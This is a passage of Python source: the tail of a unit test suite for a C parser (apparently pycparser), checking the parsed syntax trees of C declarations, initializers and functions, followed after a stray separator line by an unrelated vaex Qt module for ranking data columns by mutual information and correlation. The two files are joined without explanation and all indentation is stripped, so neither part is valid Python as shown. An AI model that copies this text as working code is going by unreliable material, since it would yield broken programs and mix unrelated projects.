['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', None,
['Union', None,
[['Decl', 'id',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'name',
['PtrDecl',
['TypeDecl',
['IdentifierType', ['char']]]]]]]],
['Decl', 'f',
['TypeDecl',
['IdentifierType', ['float']]]]]]]])
# ISO/IEC 9899:201x Commitee Draft 2010-11-16, N1539
# section 6.7.2.1, par. 19, example 1
s3 = """
struct v {
union {
struct { int i, j; };
struct { long k, l; } w;
};
int m;
} v1;
"""
self.assertEqual(expand_decl(self.parse(s3).ext[0]),
['Decl', 'v1',
['TypeDecl',
['Struct', 'v',
[['Decl', None,
['Union', None,
[['Decl', None,
['Struct', None,
[['Decl', 'i',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', 'j',
['TypeDecl',
['IdentifierType', ['int']]]]]]],
['Decl', 'w',
['TypeDecl',
['Struct', None,
[['Decl', 'k',
['TypeDecl',
['IdentifierType', ['long']]]],
['Decl', 'l',
['TypeDecl',
['IdentifierType', ['long']]]]]]]]]]],
['Decl', 'm',
['TypeDecl',
['IdentifierType', ['int']]]]]]]])
s4 = """
struct v {
int i;
float;
} v2;"""
# just make sure this doesn't raise ParseError
self.parse(s4)
def test_struct_bitfields(self):
# a struct with two bitfields, one unnamed
s1 = """
struct {
int k:6;
int :2;
} joe;
"""
parsed_struct = self.parse(s1).ext[0]
# We can see here the name of the decl for the unnamed bitfield is
# None, but expand_decl doesn't show bitfield widths
# ...
self.assertEqual(expand_decl(parsed_struct),
['Decl', 'joe',
['TypeDecl', ['Struct', None,
[ ['Decl', 'k',
['TypeDecl',
['IdentifierType', ['int']]]],
['Decl', None,
['TypeDecl',
['IdentifierType', ['int']]]]]]]])
# ...
# so we test them manually
self.assertEqual(parsed_struct.type.type.decls[0].bitsize.value, '6')
self.assertEqual(parsed_struct.type.type.decls[1].bitsize.value, '2')
def test_tags_namespace(self):
""" Tests that the tags of structs/unions/enums reside in a separate namespace and
can be named after existing types.
"""
s1 = """
typedef int tagEntry;
struct tagEntry
{
char* key;
char* value;
} Entry;
"""
s1_ast = self.parse(s1)
self.assertEqual(expand_decl(s1_ast.ext[1]),
['Decl', 'Entry',
['TypeDecl', ['Struct', 'tagEntry',
[['Decl', 'key',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]],
['Decl', 'value',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]]]]])
s2 = """
struct tagEntry;
typedef struct tagEntry tagEntry;
struct tagEntry
{
char* key;
char* value;
} Entry;
"""
s2_ast = self.parse(s2)
self.assertEqual(expand_decl(s2_ast.ext[2]),
['Decl', 'Entry',
['TypeDecl', ['Struct', 'tagEntry',
[['Decl', 'key',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]],
['Decl', 'value',
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]]]]])
s3 = """
typedef int mytag;
enum mytag {ABC, CDE};
enum mytag joe;
"""
s3_type = self.parse(s3).ext[1].type
self.assertTrue(isinstance(s3_type, Enum))
self.assertEqual(s3_type.name, 'mytag')
def test_multi_decls(self):
d1 = 'int a, b;'
self.assertEqual(self.get_decl(d1, 0),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['int']]]])
self.assertEqual(self.get_decl(d1, 1),
['Decl', 'b', ['TypeDecl', ['IdentifierType', ['int']]]])
d2 = 'char* p, notp, ar[4];'
self.assertEqual(self.get_decl(d2, 0),
['Decl', 'p',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]])
self.assertEqual(self.get_decl(d2, 1),
['Decl', 'notp', ['TypeDecl', ['IdentifierType', ['char']]]])
self.assertEqual(self.get_decl(d2, 2),
['Decl', 'ar',
['ArrayDecl', '4',
['TypeDecl', ['IdentifierType', ['char']]]]])
def test_invalid_multiple_types_error(self):
bad = [
'int enum {ab, cd} fubr;',
'enum kid char brbr;']
for b in bad:
self.assertRaises(ParseError, self.parse, b)
def test_decl_inits(self):
d1 = 'int a = 16;'
#~ self.parse(d1).show()
self.assertEqual(self.get_decl(d1),
['Decl', 'a', ['TypeDecl', ['IdentifierType', ['int']]]])
self.assertEqual(self.get_decl_init(d1),
['Constant', 'int', '16'])
d2 = 'long ar[] = {7, 8, 9};'
#~ self.parse(d2).show()
self.assertEqual(self.get_decl(d2),
['Decl', 'ar',
['ArrayDecl', '',
['TypeDecl', ['IdentifierType', ['long']]]]])
self.assertEqual(self.get_decl_init(d2),
[ ['Constant', 'int', '7'],
['Constant', 'int', '8'],
['Constant', 'int', '9']])
d3 = 'char p = j;'
self.assertEqual(self.get_decl(d3),
['Decl', 'p', ['TypeDecl', ['IdentifierType', ['char']]]])
self.assertEqual(self.get_decl_init(d3),
['ID', 'j'])
d4 = "char x = 'c', *p = {0, 1, 2, {4, 5}, 6};"
self.assertEqual(self.get_decl(d4, 0),
['Decl', 'x', ['TypeDecl', ['IdentifierType', ['char']]]])
self.assertEqual(self.get_decl_init(d4, 0),
['Constant', 'char', "'c'"])
self.assertEqual(self.get_decl(d4, 1),
['Decl', 'p',
['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]])
self.assertEqual(self.get_decl_init(d4, 1),
[ ['Constant', 'int', '0'],
['Constant', 'int', '1'],
['Constant', 'int', '2'],
[['Constant', 'int', '4'],
['Constant', 'int', '5']],
['Constant', 'int', '6']])
def test_decl_named_inits(self):
d1 = 'int a = {.k = 16};'
self.assertEqual(self.get_decl_init(d1),
[( [['ID', 'k']],
['Constant', 'int', '16'])])
d2 = 'int a = { [0].a = {1}, [1].a[0] = 2 };'
self.assertEqual(self.get_decl_init(d2),
[
([['Constant', 'int', '0'], ['ID', 'a']],
[['Constant', 'int', '1']]),
([['Constant', 'int', '1'], ['ID', 'a'], ['Constant', 'int', '0']],
['Constant', 'int', '2'])])
d3 = 'int a = { .a = 1, .c = 3, 4, .b = 5};'
self.assertEqual(self.get_decl_init(d3),
[
([['ID', 'a']], ['Constant', 'int', '1']),
([['ID', 'c']], ['Constant', 'int', '3']),
['Constant', 'int', '4'],
([['ID', 'b']], ['Constant', 'int', '5'])])
def test_function_definitions(self):
def parse_fdef(str):
return self.parse(str).ext[0]
def fdef_decl(fdef):
return expand_decl(fdef.decl)
f1 = parse_fdef('''
int factorial(int p)
{
return 3;
}
''')
self.assertEqual(fdef_decl(f1),
['Decl', 'factorial',
['FuncDecl',
[['Decl', 'p', ['TypeDecl', ['IdentifierType', ['int']]]]],
['TypeDecl', ['IdentifierType', ['int']]]]])
self.assertEqual(type(f1.body.block_items[0]), Return)
f2 = parse_fdef('''
char* zzz(int p, char* c)
{
int a;
char b;
a = b + 2;
return 3;
}
''')
self.assertEqual(fdef_decl(f2),
['Decl', 'zzz',
['FuncDecl',
[ ['Decl', 'p', ['TypeDecl', ['IdentifierType', ['int']]]],
['Decl', 'c', ['PtrDecl',
['TypeDecl', ['IdentifierType', ['char']]]]]],
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]])
self.assertEqual(list(map(type, f2.body.block_items)),
[Decl, Decl, Assignment, Return])
f3 = parse_fdef('''
char* zzz(p, c)
long p, *c;
{
int a;
char b;
a = b + 2;
return 3;
}
''')
self.assertEqual(fdef_decl(f3),
['Decl', 'zzz',
['FuncDecl',
[ ['ID', 'p'],
['ID', 'c']],
['PtrDecl', ['TypeDecl', ['IdentifierType', ['char']]]]]])
self.assertEqual(list(map(type, f3.body.block_items)),
[Decl, Decl, Assignment, Return])
self.assertEqual(expand_decl(f3.param_decls[0]),
['Decl', 'p', ['TypeDecl', ['IdentifierType', ['long']]]])
self.assertEqual(expand_decl(f3.param_decls[1]),
['Decl', 'c', ['PtrDecl', ['TypeDecl', ['IdentifierType', ['long']]]]])
def test_unified_string_literals(self):
# simple string, for reference
d1 = self.get_decl_init('char* s = "hello";')
self.assertEqual(d1, ['Constant', 'string', '"hello"'])
d2 = self.get_decl_init('char* s = "hello" " world";')
self.assertEqual(d2, ['Constant', 'string', '"hello world"'])
# the test case from issue 6
d3 = self.parse(r'''
int main() {
fprintf(stderr,
"Wrong Params?\n"
"Usage:\n"
"%s <binary_file_path>\n",
argv[0]
);
}
''')
self.assertEqual(
d3.ext[0].body.block_items[0].args.exprs[1].value,
r'"Wrong Params?\nUsage:\n%s <binary_file_path>\n"')
d4 = self.get_decl_init('char* s = "" "foobar";')
self.assertEqual(d4, ['Constant', 'string', '"foobar"'])
d5 = self.get_decl_init(r'char* s = "foo\"" "bar";')
self.assertEqual(d5, ['Constant', 'string', r'"foo\"bar"'])
def test_inline_specifier(self):
ps2 = self.parse('static inline void inlinefoo(void);')
self.assertEqual(ps2.ext[0].funcspec, ['inline'])
# variable length array
def test_vla(self):
ps2 = self.parse(r'''
int main() {
int size;
int var[size = 5];
int var2[*];
}
''')
self.failUnless(isinstance(ps2.ext[0].body.block_items[1].type.dim, Assignment))
self.failUnless(isinstance(ps2.ext[0].body.block_items[2].type.dim, ID))
class TestCParser_whole_code(TestCParser_base):
""" Testing of parsing whole chunks of code.
Since I don't want to rely on the structure of ASTs too
much, most of these tests are implemented with visitors.
"""
# A simple helper visitor that lists the values of all the
# Constant nodes it sees.
#
class ConstantVisitor(NodeVisitor):
def __init__(self):
self.values = []
def visit_Constant(self, node):
self.values.append(node.value)
# This visitor counts the amount of references to the ID
# with the name provided to it in the constructor.
#
class IDNameCounter(NodeVisitor):
def __init__(self, name):
self.name = name
self.nrefs = 0
def visit_ID(self, node):
if node.name == self.name:
self.nrefs += 1
# Counts the amount of nodes of a given class
#
class NodeKlassCounter(NodeVisitor):
def __init__(self, node_klass):
self.klass = node_klass
self.n = 0
def generic_visit(self, node):
if node.__class__ == self.klass:
self.n += 1
NodeVisitor.generic_visit(self, node)
def assert_all_Constants(self, code, constants):
""" Asserts that the list of all Constant values (by
'preorder' appearance) in the chunk of code is as
given.
"""
if isinstance(code, str):
parsed = self.parse(code)
else:
parsed = code
cv = self.ConstantVisitor()
cv.visit(parsed)
self.assertEqual(cv.values, constants)
def assert_num_ID_refs(self, code, name, num):
""" Asserts the number of references to the ID with
the given name.
"""
if isinstance(code, str):
parsed = self.parse(code)
else:
parsed = code
iv = self.IDNameCounter(name)
iv.visit(parsed)
self.assertEqual(iv.nrefs, num)
def assert_num_klass_nodes(self, code, klass, num):
""" Asserts the amount of klass nodes in the code.
"""
if isinstance(code, str):
parsed = self.parse(code)
else:
parsed = code
cv = self.NodeKlassCounter(klass)
cv.visit(parsed)
self.assertEqual(cv.n, num)
def test_expressions(self):
e1 = '''int k = (r + 10.0) >> 6 + 8 << (3 & 0x14);'''
self.assert_all_Constants(e1, ['10.0', '6', '8', '3', '0x14'])
e2 = r'''char n = '\n', *prefix = "st_";'''
self.assert_all_Constants(e2, [r"'\n'", '"st_"'])
def test_statements(self):
s1 = r'''
void foo(){
if (sp == 1)
if (optind >= argc ||
argv[optind][0] != '-' || argv[optind][1] == '\0')
return -1;
else if (strcmp(argv[optind], "--") == 0) {
optind++;
return -1;
}
}
'''
self.assert_all_Constants(s1,
['1', '0', r"'-'", '1', r"'\0'", '1', r'"--"', '0', '1'])
ps1 = self.parse(s1)
self.assert_num_ID_refs(ps1, 'argv', 3)
self.assert_num_ID_refs(ps1, 'optind', 5)
self.assert_num_klass_nodes(ps1, If, 3)
self.assert_num_klass_nodes(ps1, Return, 2)
self.assert_num_klass_nodes(ps1, FuncCall, 1) # strcmp
self.assert_num_klass_nodes(ps1, BinaryOp, 7)
# In the following code, Hash and Node were defined as
# int to pacify the parser that sees they're used as
# types
#
s2 = r'''
typedef int Hash, Node;
void HashDestroy(Hash* hash)
{
unsigned int i;
if (hash == NULL)
return;
for (i = 0; i < hash->table_size; ++i)
{
Node* temp = hash->heads[i];
while (temp != NULL)
{
Node* temp2 = temp;
free(temp->entry->key);
free(temp->entry->value);
free(temp->entry);
temp = temp->next;
free(temp2);
}
}
free(hash->heads);
hash->heads = NULL;
free(hash);
}
'''
ps2 = self.parse(s2)
self.assert_num_klass_nodes(ps2, FuncCall, 6)
self.assert_num_klass_nodes(ps2, FuncDef, 1)
self.assert_num_klass_nodes(ps2, For, 1)
self.assert_num_klass_nodes(ps2, While, 1)
self.assert_num_klass_nodes(ps2, StructRef, 10)
# declarations don't count
self.assert_num_ID_refs(ps2, 'hash', 6)
self.assert_num_ID_refs(ps2, 'i', 4)
s3 = r'''
void x(void) {
int a, b;
if (a < b)
do {
a = 0;
} while (0);
else if (a == b) {
a = 1;
}
}
'''
ps3 = self.parse(s3)
self.assert_num_klass_nodes(ps3, DoWhile, 1)
self.assert_num_ID_refs(ps3, 'a', 4)
self.assert_all_Constants(ps3, ['0', '0', '1'])
def test_empty_statement(self):
s1 = r'''
void foo(void){
;
return;
}
'''
ps1 = self.parse(s1)
self.assert_num_klass_nodes(ps1, EmptyStatement, 1)
self.assert_num_klass_nodes(ps1, Return, 1)
def test_for_statement(self):
s2 = r'''
void x(void)
{
int i;
for (i = 0; i < 5; ++i) {
x = 50;
}
}
'''
ps2 = self.parse(s2)
self.assert_num_klass_nodes(ps2, For, 1)
# here there are 3 refs to 'i' since the declaration doesn't count as
# a ref in the visitor
#
self.assert_num_ID_refs(ps2, 'i', 3)
s3 = r'''
void x(void)
{
for (int i = 0; i < 5; ++i) {
x = 50;
}
}
'''
ps3 = self.parse(s3)
self.assert_num_klass_nodes(ps3, For, 1)
# here there are 2 refs to 'i' since the declaration doesn't count as
# a ref in the visitor
#
self.assert_num_ID_refs(ps3, 'i', 2)
def _open_c_file(self, name):
""" Find a c file by name, taking into account the current dir can be
in a couple of typical places
"""
fullnames = [
os.path.join('c_files', name),
os.path.join('tests', 'c_files', name)]
for fullname in fullnames:
if os.path.exists(fullname):
return open(fullname, 'rU')
assert False, "Unreachable"
def test_whole_file(self):
# See how pycparser handles a whole, real C file.
#
code = self._open_c_file('memmgr_with_h.c').read()
p = self.parse(code)
self.assert_num_klass_nodes(p, FuncDef, 5)
# each FuncDef also has a FuncDecl. 4 declarations
# + 5 definitions, overall 9
self.assert_num_klass_nodes(p, FuncDecl, 9)
self.assert_num_klass_nodes(p, Typedef, 4)
self.assertEqual(p.ext[4].coord.line, 88)
self.assertEqual(p.ext[4].coord.file, "./memmgr.h")
self.assertEqual(p.ext[6].coord.line, 10)
self.assertEqual(p.ext[6].coord.file, "memmgr.c")
def test_whole_file_with_stdio(self):
# Parse a whole file with stdio.h included by cpp
#
code = self._open_c_file('cppd_with_stdio_h.c').read()
p = self.parse(code)
self.failUnless(isinstance(p.ext[0], Typedef))
self.assertEqual(p.ext[0].coord.line, 213)
self.assertEqual(p.ext[0].coord.file, "D:\eli\cpp_stuff\libc_include/stddef.h")
self.failUnless(isinstance(p.ext[-1], FuncDef))
self.assertEqual(p.ext[-1].coord.line, 15)
self.assertEqual(p.ext[-1].coord.file, "example_c_file.c")
self.failUnless(isinstance(p.ext[-8], Typedef))
self.failUnless(isinstance(p.ext[-8].type, TypeDecl))
self.assertEqual(p.ext[-8].name, 'cookie_io_functions_t')
class TestCParser_typenames(TestCParser_base):
""" Test issues related to the typedef-name problem.
"""
def test_innerscope_typedef(self):
# should fail since TT is not a type in bar
s1 = r'''
void foo() {
typedef char TT;
TT x;
}
void bar() {
TT y;
}
'''
self.assertRaises(ParseError, self.parse, s1)
# should succeed since TT is not a type in bar
s2 = r'''
void foo() {
typedef char TT;
TT x;
}
void bar() {
unsigned TT;
}
'''
self.failUnless(isinstance(self.parse(s2), FileAST))
if __name__ == '__main__':
#~ suite = unittest.TestLoader().loadTestsFromNames(
#~ ['test_c_parser.TestCParser_fundamentals.test_typedef'])
#~ suite = unittest.TestLoader().loadTestsFromNames(
#~ ['test_c_parser.TestCParser_whole_code.test_whole_file_with_stdio'])
#~ suite = unittest.TestLoader().loadTestsFromTestCase(
#~ TestCParser_whole_code)
#~ unittest.TextTestRunner(verbosity=2).run(suite)
unittest.main()
|
|
import itertools
import numpy as np
# from pyjavaproperties import Properties
from vaex.ext import jprops
import collections
import functools
from vaex.ui.qt import *
import vaex.dataset
import vaex.ui.plot_windows
import logging as logging
import vaex.ui.qt as dialogs
import vaex.execution
import vaex.kld
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
# from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
import scipy.stats
logger = logging.getLogger("vaex.ranking")
# since we do many columns at once, a smallar buffer will lead to more resposiveness in the gui
buffer_size = 1e6
def unique_column_names(dataset):
# return list(set(dataset.column_names) | set(dataset.virtual_columns.keys()))
return dataset.get_column_names(virtual=True)
testing = False
class PlotDialog(QtGui.QDialog):
def __init__(self, parent, width=5, height=4, dpi=100, **options):
super(PlotDialog, self).__init__()
self.parent_widget = parent
self.figure = plt.figure()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas, self)
self.layout = QtGui.QVBoxLayout()
self.layout.addWidget(self.toolbar)
self.layout.addWidget(self.canvas)
self.setLayout(self.layout)
self.figure.canvas.mpl_connect('motion_notify_event', self._on_mouse_motion)
self.figure.canvas.mpl_connect('button_press_event', self._on_mouse_button)
# self.plot()
def _on_mouse_motion(self, event):
if event.xdata is not None and event.ydata is not None:
self.on_mouse_motion(event)
def _on_mouse_button(self, event):
if event.xdata is not None and event.ydata is not None:
self.on_mouse_button(event)
def on_mouse_button(self, event):
pass
def on_mouse_motion(self, event):
label, x, y = self.get_tooltip(event)
self.set_tooltip(x, y, label)
def set_tooltip(self, x, y, label):
y = self.canvas.height() - 1 - y
print(("motion", label, x, y))
if label:
print(("self.canvas.x/y()", self.canvas.geometry().x(), self.canvas.geometry().y()))
print(("self.pos.x/y()", self.canvas.pos().x() + self.pos().x(), self.canvas.pos().y() + self.pos().y()))
point = QtCore.QPoint(x + self.canvas.x() + self.pos().x(), y + self.canvas.y() + self.pos().y())
QtGui.QToolTip.showText(point, label)
def plot(self):
pass
class RankPlot(PlotDialog):
def __init__(self, parent, table):
super(RankPlot, self).__init__(parent)
self.table = table
self.button_update_data = QtGui.QPushButton('Update data')
self.button_update_data.clicked.connect(self.update_data)
self.layout.addWidget(self.button_update_data)
grid_layout = QtGui.QGridLayout()
grid_layout.setColumnStretch(2, 1)
grid_layout.setAlignment(QtCore.Qt.AlignTop)
grid_layout.setSpacing(0)
grid_layout.setContentsMargins(0, 0, 0, 0)
self.layout.addLayout(grid_layout)
row = 0
self.options = ["mutual_information", "rank(mutual_information)", "correlation_coefficient", "rank(correlation_coefficient)", "abs(correlation_coefficient)", "rank(abs(correlation_coefficient))"]
self.expression_x = "mutual_information"
self.expression_y = "correlation_coefficient"
self.codeline_x = Codeline(self, "x", self.options,
getter=attrgetter(self, "expression_x"),
setter=attrsetter(self, "expression_x"),
update=self.plot)
self.codeline_y = Codeline(self, "y", self.options,
getter=attrgetter(self, "expression_y"),
setter=attrsetter(self, "expression_y"),
update=self.plot)
row = self.codeline_x.add_to_grid_layout(row, grid_layout)
row = self.codeline_y.add_to_grid_layout(row, grid_layout)
self.axes = self.figure.add_subplot(111)
if 0:
def onpick(event):
thisline = event.artist
xdata = thisline.get_xdata()
ydata = thisline.get_ydata()
index = event.ind
print((index, xdata[index], ydata[index], self.pairs[index]))
self.table.select_pair(self.pairs[index])
self.figure.canvas.mpl_connect('pick_event', onpick)
self.update_data()
self.plot()
def on_mouse_button(self, event):
min_distance_index, x, y = self.find_nearest(event)
print(("click", x, y))
self.table.select_pair(self.pairs[min_distance_index])
def update_tooltip():
label, x, y = self.get_tooltip(event)
self.set_tooltip(x, y, label)
QtCore.QTimer.singleShot(100, update_tooltip)
def find_nearest(self, event):
transform = event.inaxes.transData.transform
xy = transform(list(zip(self.x, self.y)))
# print xy
x, y = xy.T
print(("event.x/y", event.x, event.y))
distances = np.sqrt((x - event.x)**2 + (y - event.y)**2)
min_distance_index = np.argmin(distances)
return min_distance_index, x[min_distance_index], y[min_distance_index]
def get_tooltip(self, event):
min_distance_index, x, y = self.find_nearest(event)
label = "-".join(self.pairs[min_distance_index])
return label, x, y
def update_data(self):
self.variables = {}
self.pairs = pairs = self.table.getSelected()
mi = [self.table.qualities[pair] for pair in pairs]
corr = [self.table.correlation_map[pair] for pair in pairs]
self.variables["mutual_information"] = np.array(mi)
self.variables["correlation_coefficient"] = np.array(corr)
def plot(self):
scope = {}
scope.update(np.__dict__)
scope.update(self.variables)
scope["rank"] = scipy.stats.rankdata
self.x = x = eval(self.expression_x, scope)
self.y = y = eval(self.expression_y, scope)
self.axes.cla()
self.axes.plot(x, y, '.', picker=5)
self.canvas.draw()
class ____RankingTableModel(QtCore.QAbstractTableModel):
def __init__(self, dataset, dim=1, parent=None, *args):
QtCore.QAbstractTableModel.__init__(self, parent, *args)
self.dataset = dataset
self.pairs = list(itertools.combinations(unique_column_names(self.dataset), dim))
self.ranking = [None for pair in self.pairs]
self.headers = ["subspace", "Mutual information", "MI ranking", "correlation", "MI ranking", 'selected']
self.indices = list(range(len(self.pairs)))
def rowCount(self, parent):
return len(self.pairs)
def columnCount(self, parent):
return len(self.headers)
def data(self, index, role):
if not index.isValid():
return None
elif role != QtCore.Qt.DisplayRole:
return None
column = index.column()
index = self.indices[index.row()] # use sorted index
if column == 0:
return "-vs".join(self.pairs[index])
if column == 1:
rank = self.ranking[index]
return "" if rank is None else str(rank)
if column == 2:
rank = self.ranking[index]
return False if random.random() < 0.5 else True
def headerData(self, index, orientation, role):
if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
return self.headers[index]
if orientation == QtCore.Qt.Vertical and role == QtCore.Qt.DisplayRole:
return str(index + 1)
return None
def sort(self, Ncol, order):
"""Sort table by given column number.
"""
self.emit(QtCore.SIGNAL("layoutAboutToBeChanged()"))
if Ncol == 0:
print("by name")
# get indices, sorted by pair name
sortlist = list(zip(self.pairs, list(range(len(self.pairs)))))
print(sortlist)
sortlist.sort(key=operator.itemgetter(0))
print(sortlist)
self.indices = list(map(operator.itemgetter(1), sortlist))
print((self.indices))
if Ncol == 1:
# get indices, sorted by ranking, or no sorting
if None not in self.ranking:
sortlist = list(zip(self.ranking, list(range(len(self.pairs)))))
sortlist.sort(key=operator.itemgetter(0))
self.indices = list(map(operator.itemgetter(1), sortlist))
else:
self.indices = list(range(len(self.pairs)))
print((self.indices))
if order == QtCore.Qt.DescendingOrder:
self.indices.reverse()
print((self.indices))
self.emit(QtCore.SIGNAL("layoutChanged()"))
class SubspaceTable(QtGui.QTableWidget):
def __init__(self, dialog, parent, mainPanel, dataset, pairs, dim, properties):
self.dialog = dialog
self.dim = dim
if dim == 1:
self.headers = ['', 'space', "min", "max", 'plot']
else:
self.headers = ['', 'space', "Mutual information", "Correlation", 'plot']
self.properties = properties
self.qualities = {}
self.correlation_map = {}
if testing:
self.qualities = {key: np.random.random() for key in pairs}
self.correlation_map = {key: np.random.normal() for key in pairs}
# print ", ".join([""+("-".join(pair))+"" for pair in pairs])
self.dataset = dataset
self.filter_terms = []
self.mainPanel = mainPanel
self.pairs = list(pairs) # list(itertools.combinations(self.dataset.column_names, dim))
QtGui.QTableWidget.__init__(self, len(self.pairs), len(self.headers), parent)
self.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows)
self.filter_mask = np.array([True for pair in pairs])
self.selected_dict = {pair: self.properties.get(".".join(pair) + ".use", "True") == "True" for pair in pairs}
# self.tableModel = RankingTableModel(self.dataset, dim, parent)
# self.setModel(self.tableModel)
# self.sortByColumn(0, QtCore.Qt.AscendingOrder)
# self.setSortingEnabled(True)
# self.pair_to_item = {}
self.defaultFlags = QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsEditable
# print self.properties._props
if 1:
# self.ranking = [None for pair in self.pairs]
self.dim = dim
self.setHorizontalHeaderLabels(self.headers)
# self.setVerticalHeaderLabels(map(str, range(len(self.pairs))))
self.fill_table()
self.setSortingEnabled(True)
self.queue_fill_table = vaex.ui.plot_windows.Queue("fill table", 200, self.fill_table)
def pair_to_text(self, pair):
return " ".join(map(str, pair))
def select_pair(self, pair):
# self.setSortingEnabled(False)
index = self.pairs.index(pair)
for i in range(self.rowCount()):
item = self.item(i, 1)
print((item.text(), self.pair_to_text(pair)))
if item.text() == self.pair_to_text(pair):
self.selectRow(i)
# print index, self.visualRow(index)
# self.selectRow(self.visualRow(index))
# self.setSortingEnabled(True)
def fill_table(self):
# bug in qt? http://stackoverflow.com/questions/7960505/strange-qtablewidget-behavior-not-all-cells-populated-after-sorting-followed-b
# fix: disable sorting, then enable again
self.setSortingEnabled(False)
self.checkboxes = []
self.buttons = []
pairs = [pair for pair, display in zip(self.pairs, self.filter_mask) if display]
self.setRowCount(len(pairs))
self.setVerticalHeaderLabels(list(map(str, list(range(len(pairs))))))
for i in range(len(pairs)):
pair = pairs[i]
text = self.pair_to_text(pair)
item = QtGui.QTableWidgetItem(text)
self.setItem(i, 1, item)
item.setFlags(self.defaultFlags)
# item = QtGui.QTableWidgetItem()
# item.setData(QtCore.Qt.DisplayRole, QtCore.QVariant(True))
# item.setFlags(QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsUserCheckable)
checkbox = QtGui.QCheckBox(self)
use_key = ".".join(map(str, pair)) + ".use"
# if self.dim == 1 and use_key in self.properties._props:
# #print use_key, eval(self.properties[use_key])
# checkbox.setCheckState(QtCore.Qt.Checked if eval(self.properties[use_key]) else QtCore.Qt.Unchecked)
# else:
# checkbox.setCheckState(QtCore.Qt.Checked)
print(("fill", pair, self.selected_dict[pair]))
checkbox.setCheckState(QtCore.Qt.Checked if self.selected_dict[pair] else QtCore.Qt.Unchecked)
self.checkboxes.append(checkbox)
self.setCellWidget(i, 0, checkbox)
def stateChanged(state, pair=pair):
self.selected_dict[pair] = state == QtCore.Qt.Checked
print(("set", pair, "to", self.selected_dict[pair]))
checkbox.stateChanged.connect(stateChanged)
if self.dim == 1:
button = QtGui.QPushButton("plot: " + text, self)
def plot(_ignore=None, pair=pair):
ranges = [self.dialog.range_map[k] for k in pair]
self.mainPanel.histogram(*pair, ranges=ranges)
button.clicked.connect(plot)
self.setCellWidget(i, 4, button)
min_key = pair[0] + ".min"
max_key = pair[0] + ".max"
if 1:
# print "test", min_key
if min_key in self.properties:
item = QtGui.QTableWidgetItem() # "%s" % quality)
value = self.properties[min_key]
# print "it is in... and value =", value
item.setText("%s" % value)
item.setData(QtCore.Qt.DisplayRole, float(value))
item.setFlags(self.defaultFlags)
self.setItem(i, 2, item)
if max_key in self.properties:
value = self.properties[max_key]
item = QtGui.QTableWidgetItem() # "%s" % quality)
item.setText("%s" % value)
item.setData(QtCore.Qt.DisplayRole, float(value))
item.setFlags(self.defaultFlags)
self.setItem(i, 3, item)
else:
# print "quality", quality, qualities
# row = self.pairs.index(pair)
quality = self.qualities.get(pair)
if quality is not None:
item = QtGui.QTableWidgetItem() # "%s" % quality)
item.setText("%s" % quality)
item.setData(QtCore.Qt.DisplayRole, float(quality))
item.setFlags(self.defaultFlags)
self.setItem(i, 2, item)
correlation = self.correlation_map.get(pair)
if correlation is not None:
item = QtGui.QTableWidgetItem() # "%s" % quality)
item.setText("%s" % correlation)
item.setData(QtCore.Qt.DisplayRole, float(correlation))
item.setFlags(self.defaultFlags)
self.setItem(i, 3, item)
if self.dim == 2:
button = QtGui.QPushButton("plot: " + text, self)
def plot(_ignore=None, pair=pair):
ranges = [self.dialog.range_map[k] for k in pair]
self.mainPanel.plotxy(*pair, ranges=ranges)
button.clicked.connect(
plot)
self.setCellWidget(i, 4, button)
self.buttons.append(button) # keep ref count
if self.dim == 3:
button = QtGui.QPushButton("plot: " + text, self)
def plot(_ignore=None, pair=pair):
ranges = [self.dialog.range_map[k] for k in pair]
self.mainPanel.plotxyz(*pair, ranges=ranges)
button.clicked.connect(plot)
self.setCellWidget(i, 4, button)
self.buttons.append(button) # keep ref count
# self.setItem(i, 1, item)
self.setSortingEnabled(True)
def getSelected(self):
selection = [checkbox.checkState() == QtCore.Qt.Checked for checkbox in self.checkboxes]
selected_pairs = [pair for pair, selected in zip(self.pairs, selection) if selected]
return selected_pairs
def setQualities(self, pairs, qualities):
self.qualities = {}
for quality, pair in zip(qualities, pairs):
self.qualities[pair] = quality
# item = self.pair_to_item[pair]
# print "quality", quality, qualities
# row = self.pairs.index(pair)
# item = QtGui.QTableWidgetItem()#"%s" % quality)
# item.setText("%s" % quality)
# item.setData(QtCore.Qt.DisplayRole, float(quality))
# item.setFlags(self.defaultFlags)
# self.setItem(row, 2, item)
self.fill_table()
def set_correlations(self, correlation_map):
self.correlation_map = dict(correlation_map)
self.fill_table()
def get_range(self, pair):
index = self.pairs.index(pair)
mi = self.item(index, 2)
ma = self.item(index, 3)
if mi is None or ma is None:
return None, None
# print pair, mi, ma
# print mi.data(QtCore.Qt.DisplayRole)
mi = None if mi is None else float(mi.data(QtCore.Qt.DisplayRole))
ma = None if ma is None else float(ma.data(QtCore.Qt.DisplayRole))
# print "->", pair, mi, ma
return mi, ma
def setRanges(self, pairs, ranges):
for (mi, ma), pair in zip(ranges, pairs):
# item = self.pair_to_item[pair]
row = self.pairs.index(pair)
item = QtGui.QTableWidgetItem() # "%s" % quality)
item.setText("%s" % mi)
item.setData(QtCore.Qt.DisplayRole, float(mi))
item.setFlags(self.defaultFlags)
self.setItem(row, 2, item)
item = QtGui.QTableWidgetItem() # "%s" % quality)
item.setText("%s" % ma)
item.setData(QtCore.Qt.DisplayRole, float(ma))
item.setFlags(self.defaultFlags)
self.setItem(row, 3, item)
def deselect(self, pair):
index = self.pairs.index(pair)
print(("deselect", pair, index))
